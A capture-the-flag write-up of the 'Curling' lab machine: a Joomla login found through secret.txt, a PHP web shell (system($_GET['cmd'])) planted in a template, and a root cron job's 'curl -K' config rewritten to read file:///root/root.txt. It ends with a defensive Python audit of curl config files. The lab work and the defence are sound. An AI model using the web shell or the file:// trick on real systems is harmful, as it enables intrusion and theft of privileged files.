Curling
Easy - Linux
Recon
# Nmap 7.92 scan initiated Thu Dec 22 23:44:41 2022 as: nmap -p22,80 -sC -sV -oN /home/ventus/htb/labs/Curling/nmap.txt 10.10.10.150
Nmap scan report for 10.10.10.150
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
| 256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 22 23:44:55 2022 -- 1 IP address (1 host up) scanned in 14.16 seconds
Browsing to the web service, we can see it is a Joomla instance. Enumerating the version, I couldn't find any particular exploits that worked, so moving on. We can see a few posts on the home page, and one of them is signed by Floris.
Getting RCE & Lateral Movement
Viewing the home page source, there's an HTML comment with the content: secret.txt. Navigating to that gives us a password, and logging in as floris gives us the Super User account, but no SSH yet. Let's get RCE first. Inserting a simple system($_GET["cmd"]) into the template's error.php gave us command execution as www-data. That's a start. Let's try to view floris' directory. password_backup is readable, and seems to be a hexdump of something. I'll exfil that to my attacking machine, run xxd -r to revert it back to its original form, and run file to identify what it is. It's a bzip2 compressed archive, so let's run bunzip2. Another archive. It turned out to be multiple layers of archives, but finally we get a password.txt which we could use to log in to floris through SSH.
Privilege Escalation
In floris' home directory, there's an interesting subdir named admin-area with two files: input and report. The contents of input were odd, but correlated with the contents of report:
url = 'http://127.0.0.1'
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta charset="utf-8" />
<base href="http://127.0.0.1/" />
<meta name="description" content="best curling site on the planet!" />
<meta name="generator" content="Joomla! - Open Source Content Management" />
<title>Home</title>
<link href="/index.php?format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...
To learn more about the situation, I ran pspy to view possible cron jobs running periodically.
2022/12/23 06:34:01 CMD: UID=0 PID=14413 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2022/12/23 06:34:01 CMD: UID=0 PID=14412 | sleep 1
2022/12/23 06:34:01 CMD: UID=0 PID=14411 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2022/12/23 06:34:01 CMD: UID=0 PID=14410 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
There was indeed a cron job calling curl with the -K flag pointing to the input file and writing the response to report. Viewing the man page for curl, we can find that the -K flag takes curl arguments from a file. I first thought we might be able to insert a malicious argument, but then remembered to keep it simple. Let's try to alter the url to the root flag instead:
url = "file:///root/root.txt"
Sure enough, the root flag appeared in report. Another one done!
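The root cron job above trusts a user-writable file as curl's entire argument list. As an added example (not part of this writeup or of curl), here is a Python audit that parses curl's -K config syntax, flags the directives a root-run job should never take from a non-root user (non-http(s) URL schemes such as file://, output paths outside the job's directory, nested -K and upload options), and adds the ownership check the cron job was missing; the directory /home/floris/admin-area is taken from the page, and the option names are curl's own.

```python
import os
import re
from urllib.parse import urlsplit

# Short flags a config file may use, mapped to the long names the audit checks.
SHORT_FLAGS = {"o": "output", "K": "config", "T": "upload-file"}
ALLOWED_SCHEMES = ("http", "https")

def parse_curl_config(text):
    """Parse curl -K syntax: '# comment', 'opt = val', 'opt: val', 'opt val',
    '--opt val' / '-o val', double-quoted values and bare URL lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"[a-z][a-z0-9+.-]*://", line, re.I):  # bare URL line
            entries.append(("url", line))
            continue
        if line.startswith("-"):  # dashed form: only whitespace separates option and value
            parts = line.lstrip("-").split(None, 1)
        else:  # long-name form: '=', ':' or whitespace separates option and value
            parts = re.split(r"\s*[=:]\s*|\s+", line, maxsplit=1)
        option, value = parts[0], (parts[1].strip() if len(parts) > 1 else "")
        quoted = re.match(r'"((?:\\.|[^"\\])*)"', value)
        if quoted:  # drop the quotes and resolve \" and \\ escapes
            value = re.sub(r"\\(.)", r"\1", quoted.group(1))
        entries.append((SHORT_FLAGS.get(option, option), value))
    return entries

def audit_curl_config(text, allowed_dir="/home/floris/admin-area"):
    """Findings for directives a root-run 'curl -K' must not accept from a user file."""
    findings = []
    for option, value in parse_curl_config(text):
        if option == "url":
            scheme = urlsplit(value).scheme.lower()
            if scheme not in ALLOWED_SCHEMES:  # catches file:// reads of root-only files
                findings.append(f"url scheme '{scheme}' not allowed: {value}")
        elif option == "output":
            target = os.path.normpath(os.path.join(allowed_dir, value))
            if not target.startswith(allowed_dir.rstrip("/") + "/"):
                findings.append(f"output path leaves {allowed_dir}: {value}")
        elif option in ("config", "upload-file"):
            findings.append(f"'{option}' gives the config writer root-level file access: {value}")
    return findings

def config_is_trustworthy(path):
    """Root should only honour a config it owns and that group/others cannot write."""
    st = os.stat(path)
    return st.st_uid == 0 and not st.st_mode & 0o022
```

Running audit_curl_config over the input file before the cron job's curl call, and refusing to run when config_is_trustworthy is false, would have stopped the file:// read shown above.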